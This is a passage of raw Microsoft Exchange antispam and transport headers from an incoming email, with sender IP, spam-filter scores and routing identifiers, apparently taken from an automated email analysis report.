            X-Microsoft-Antispam-Message-Info-Original mFvMEf5hDmutgKfRe7d/om3yquriAmGEXCnRLko6PAB2wftJNhTLvI5P7/C4UNn5W9FP/jD4mYmAcBdG1yyVWdmxqL9hT01zNYo4Wi+T7Ddr2W47JApcgtbIpfU3eboXqm90lsCxruTJOV4QqZ5WNemTxySqJlvpgKOqAedH55xKkiiqnvkZbvKOLdwWxOWEF9P3cxZGSACZ7w3vU9rnL3Ic521bAP4tVMLZWr2QBr8NG6Sk6iCoRlpIyhGVKN3ZVWY9Pu0dYgtWzzyrGKLCgOb78MlNCdi+FuVkOYSpTW0aUH3YceQUiWrshSyOoF8XMnFUyDvf3Q3vqa4BDPCJKjDoUk7XiYL87U4C59RluPbtPruTy7vHCHcqC1EDXTzmrtsv40zBG/AVYoWLHRzApGQZVRpRZV0bw4mZc4Yk8UjPp+E395nvFlIgHC7vJcpQvulWl14MK0ohk96Q3e+2N0LG+ayhfxsEMVf2uK8CHpaBGcw4OvUo8p8YCYjd2q8p1O3UBc1jVR0TjP1RKgHvoJQHaf8BcpGnL2ws3X49kXDDM53IJwxwuNC06Sr8QKg2zqoE/9ywX/8Ge1j5xT7tDaJAxa45MubivLK5hr7wRQ2t8LuExbyeUL/HoxP1hZQF9p+aM+8rR0Y2LDw+USBkI49wjSolbMo7ntsBWb4Rs8wGZ3hUdP0VKw2bzReE8B/SB4glKViz2bGDs4X0JE52SAaPBYA2/BhINq43tX/H8lu6xNjiRbxTqnY55PNPSik9ADUAifqr+2AjKUsvFr8thS0MlLEt83phI6Hf3R8YhoXQLvqXK6WN+FFduxB3fe7eCs1FZ5oSRR6HLWBgiAG7A/sCS8XJsJvbMzTdiCqwrlhT7uqwyC39LWEEu0OWSLJ9onlzpvvN1XnZ8alaGpdh2T5Froe60qkkhaNRIashv0WalP5b1Qm6502BtvpiXrQ2DEj3FQ+snuD+7c85UnZLrl+e3Un5naKF+IRSzG0VN7v/v9bfZ8I6F1qQORy08SfOBLmSLIyUi4ttzPBOo3wOHDGaLpPX4Qet7aPRusB/gJEre9MaQRot6NAo2uSzmbCpQ16tRmi6wccXy6gaP/VmFA==
            X-Forefront-Antispam-Report-Untrusted CIP:185.161.211.105;CTRY:NL;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:[127.0.0.1];PTR:185.161.211.105.deltahost-ptr;CAT:NONE;SFS:(13230040)(376014)(1800799024)(36860700013)(82310400026)(2613699012);DIR:OUT;SFP:1102;
            X-Ms-Exchange-Transport-CrosstenantheadersstampedLO3P123MB3179
            X-Ms-Exchange-Organization-Expirationstarttime16 Oct 2024 19:33:40.5898 (UTC)
            X-Ms-Exchange-Organization-ExpirationstarttimereasonOriginalSubmit
            X-Ms-Exchange-Organization-Expirationinterval1:00:00:00.0000000
            X-Ms-Exchange-Organization-ExpirationintervalreasonOriginalSubmit
            X-Ms-Exchange-Organization-Network-Message-Id ebe934d3-16e0-4d40-c41d-08dcee197053
            X-Eoptenantattributedmessage704f30be-15a6-482a-b249-cfe161841910:0
            X-Ms-Exchange-Organization-MessagedirectionalityIncoming
            X-Ms-Exchange-Transport-Crosstenantheadersstripped YT2PEPF000001CA.CANPRD01.PROD.OUTLOOK.COM
            X-Ms-Exchange-Transport-Crosstenantheaderspromoted YT2PEPF000001CA.CANPRD01.PROD.OUTLOOK.COM
            X-Ms-PublictraffictypeEmail
            X-Ms-Exchange-Organization-Authsource YT2PEPF000001CA.CANPRD01.PROD.OUTLOOK.COM
            X-Ms-Exchange-Organization-AuthasAnonymous
            X-Ms-Office365-Filtering-Correlation-Id-Prvs 5fbb6e9c-dc31-4f0e-e490-08dcee196ee7
            X-Ms-Exchange-AtpmessagepropertiesSA|SL

            Icon Hash:46070c0a8e0c67d6